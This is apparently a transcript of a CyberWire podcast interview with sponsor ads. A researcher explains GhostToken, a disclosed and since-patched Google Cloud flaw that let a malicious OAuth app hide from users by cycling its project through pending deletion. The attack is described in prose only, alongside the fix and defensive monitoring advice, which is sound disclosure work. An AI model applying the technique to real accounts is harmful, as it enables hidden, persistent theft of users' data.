CyberWire Daily - Google's not being ghosted from vulnerabilities. [Research Saturday]
Episode Date: August 26, 2023Tal Skverer from Astrix Security joins to discuss their work on "GhostToken – Exploiting GCP application infrastructure to create invisible, unremovable trojan app on Google accounts." Astrix’s Se...curity Research Group revealed a 0-day flaw in Google’s Cloud Platform (GCP) on June 19, 2022, which was found to affect all Google users. The research states "The vulnerability, dubbed “GhostToken”, could allow threat actors to change a malicious application to be invisible and unremovable, effectively leaving the victim’s Google account infected with a trojan app forever." Google issued a patch to this vulnerability in April of this year, but researchers explain why this can be severe. The research can be found here: GhostToken – Exploiting GCP application infrastructure to create invisible, unremovable trojan app on Google accounts Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. of you, I was concerned about my data being sold by data brokers. So I decided to try Delete.me.
I have to say, Delete.me is a game changer. Within days of signing up, they started removing my
personal information from hundreds of data brokers. I finally have peace of mind knowing
my data privacy is protected. Delete.me's team does all the work for you with detailed reports
so you know exactly what's been done. Take control of your data and keep your private life Thank you. Hello, everyone, and welcome to the CyberWires Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down the threats and vulnerabilities,
solving some of the hard problems,
and protecting ourselves in a rapidly evolving cyberspace.
Thanks for joining us.
So, as part of our work, we do routine analysis of customers' environments
related to how non-human identities are connected to their environments,
and specifically in the Google Workspace environment.
And we saw something a bit odd.
That's Tal Skverer, research team lead at Asterix Security.
Today we're discussing their work Ghost Token,
exploiting GCP application infrastructure to create invisible, unremovable Trojan app on Google accounts.
We saw an app whose name was changed from,
we usually see apps that have like this, you know, readable names, like Google Drive for Work, stuff like that.
But in this case, we saw an app whose name was identical to its identifier, which is just like a chain of random letters.
So when we dived a little more deeper into that, we speculated that this happens if the developer of the app
deletes the app.
And then the backend at Google gets confused
and doesn't know where to take the name from.
And when we looked a little more deeper into that,
we found out that when you create an app in Google,
it's actually contained within a project in Google Cloud Platform,
which is the cloud infrastructure that Google provides.
And then we went ahead and created our own app within some project in GCP.
And when we deleted the app itself, then the same thing happened.
The name of the app became its unique identifier.
happened. The name of the app became its unique identifier. But then we wondered what would happen if we deleted the entire project instead of just deleting the app. And when we deleted the project,
actually the same thing happened. So the name of the app was identical to its ID,
but in GCP they have this nice feature that because a project usually contains
large amount of data that may be important, they give you 30 days to regret your decision
to delete the app, to delete the project, sorry, and it's important. And you can restore
the project to its original state. And we noticed that when the project is deleted, it's actually
not really deleted, it's like an
pending deletion state, some kind of a limbo
state. And during
this time, all the users that install
the app that is contained within
the project in GCP,
they cannot see the app
in the management page. So every user
who installed maybe, I don't know, tens
of apps, can see all the apps and the permissions that they gave them
in a single page.
And if the project that belonged to some app is deleted
or pending deletion, then they cannot see the app.
But we noticed that if we decide to restore the project
before 30 days have passed, then
all the original tokens,
which is basically the
unique password given by
Google to the app that
the app can use to access the user's
data, they start working again.
So the whole
attack scenario is pretty clear at this point.
Let's say that
a victim installs an attacker's app.
Immediately when the victim does that, the attacker can immediately delete the project
that is associated with the app because the attacker controls this project. Once they do this,
the victim cannot remove this app anymore because it's removed from the management page.
But the attacker at any time can restore the app,
quickly access the victim's data,
and then delete the project again so the app returns to this pending deletion state.
And this can go on forever
because every time you restore and delete the project,
the 30 days, they start again, they refresh.
So just so I'm clear here, I'm a user.
I download and install a Google app, and it turns out that that app is malicious.
And in installing that app, I have to grant that app permissions to access various things in my Google environment.
It could be my email.
It could be my files, whatever.
And so what you're saying is that what you've discovered here
is that the bad actor, if I go ahead and install a malicious app,
this mechanism allows the bad actors to basically disappear for a while
and then pop back up, grab some data, and then disappear for a while.
And they could do that forever.
And chances are, I would not know.
Exactly.
Yeah, that's exactly right.
And now a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs,
yet breaches continue to rise by an 18% year-over-year increase in ransomware attacks
and a $75 million record payout in 2024.
These traditional security tools expand your attack surface with public-facing IPs
that are exploited by bad actors more easily than ever with AI tools.
It's time to rethink your security.
Zscaler Zero Trust Plus AI stops attackers by hiding your attack surface, making apps and IPs invisible, eliminating lateral movement, connecting users only to specific apps, not the entire network. Thank you. And so what is going on under the hood with Google that allowed this to happen?
Okay, so I guess you can call this hindsight, but after the fact, and when I prepared my talk in the upcoming DEF CON, I wondered what happened that this scenario even happened in the first place.
And it led me to dive deep into the protocol called OAuth.
It's an authorization protocol released about a decade ago that basically powers this whole interaction between users, developers who have apps, and Google.
And when I looked into this protocol,
I noticed that while it really gives a good outline
of how the protocol is supposed to work,
it ignores two very crucial things
that basically allow this GoStock and vulnerability
to exist in the first place.
The first thing is the question of
what happens when you need to register an app.
So the original standard for OAuth doesn't really deal with that.
It leaves a lot of information to be decided by Google in this case.
Actually, in this instance, Google decided to include app registration within GCP,
which actually caused this whole project deletion,
pending deletion, and restore scenario.
And the second part that was missing
from the original protocol
is what happens in the user management page.
Because if Google would have allowed
a more thorough audit log of all accesses done by any apps to your account,
this whole vulnerability would be irrelevant
because you will be able to see any access done by apps to your account.
So the attacker couldn't have hidden their app from the user.
So these two missing pieces were actually a big reason
that the vulnerability existed in the first place.
And so you reached out to Google here to let them know,
and they've been responsive?
Yeah.
So actually, they were really responsive at the beginning,
and I think about two months after I submitted it,
I got the famous nice catch, and they started working on the fix.
But apparently it wasn't that easy to fix.
The origin of the vulnerability came from deep infrastructure of Google.
It has to do with how projects work in GCP and how apps within projects work and what they display to users and how they handle
tokens.
And I guess this was one of the reasons that caused Google to take a lot of time before
they found a good fix for it.
And during this process, they were quite responsive.
They were talking to me and we were trying to understand best what's the good way to
solve this issue.
And so ultimately what happened?
So at the end, they decided to, let's say, fix the issue by letting the users still see
apps that have been deleted.
They didn't fix the issue.
They didn't see an issue in the fact that a project enters pending deletion state and you're able to restore it.
This works as intended. So they just changed it so
users can see apps
that belong to projects that are pending deletion.
Is there any evidence that anyone had been making use of this functionality?
Yeah, that's an excellent question.
I've been really wanting to know if it's correct or not,
if it's true or not.
But it's very difficult to find out.
And the reason is that even if you are, let's say,
an administrator in your Google Workspace organization,
then you have more extensive audit logs about accesses done by apps.
But the problem is that when you try to find out in hindsight,
if someone exploited this vulnerability,
then all the accesses from this kind of apps would look just like any other app.
Because when the attacker restores the project associated with the app
and then access the user's data,
then it looks like just another normal log of an app
who has a correct name.
The name issue is fixed when you restore the app.
So there is basically no good way to find out if anyone abused this.
I'll also add that the problem is that deleting apps happen naturally
statistically in, I don't know, in several cases.
We see it in environments that we work on.
So this makes it even harder because, let's say,
you found an app who accessed your user data that is now deleted.
You don't know if someone exploited the GovStoken vulnerability
or maybe the developer of the app decided to quit and delete the app.
It happens.
So what are your recommendations, then,
for folks who think that this may be a concern?
What can they do?
My first recommendation for people who are afraid of that is basically start by monitoring.
You have a special page as a Google user where you can see all apps that have access to your account and their permissions.
So start monitoring that and remove any app that you don't trust the developer enough with your Google data.
I recently found out that my TV has full access to my Google account for some reason.
Yeah.
So this is basically my recommendation for regular Google consumers and anyone who is an admin of a Google Workspace account,
I recommend making restrictions on new apps that your users can add.
For instance, there is a nice policy in Google Workspace that allows you to say
any new apps that my users are going to install themselves
will be unable to access their drive or their
Gmail, which are the most sensitive services in Google.
Our thanks to Tal Skverer from Asterix Security for joining us.
The research is titled Ghost Token, Exploiting GCP Application Infrastructure to Create Invisible Unremovable Trojan App on Google Accounts.
We'll have a link in the show notes.
And now a message from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform
secures their personal devices, home networks, and connected lives.
Because when executives are compromised at home, your company is at risk.
In fact, over one-third of new members discover they've already been breached.
Protect your executives and their families 24-7, 365, with Black Cloak.
Learn more at blackcloak.io.
The CyberWire Research Saturday podcast is a production of N2K Networks,
proudly produced in Maryland
out of the startup studios of DataTribe,
where they're co-building the next generation
of cybersecurity teams and technologies. This episode was produced by Liz Ervin and senior producer Jennifer Iben.
Our mixer is Elliot Peltzman. Our executive editor is Peter Kilby. And I'm Dave Bittner.
Thanks for listening.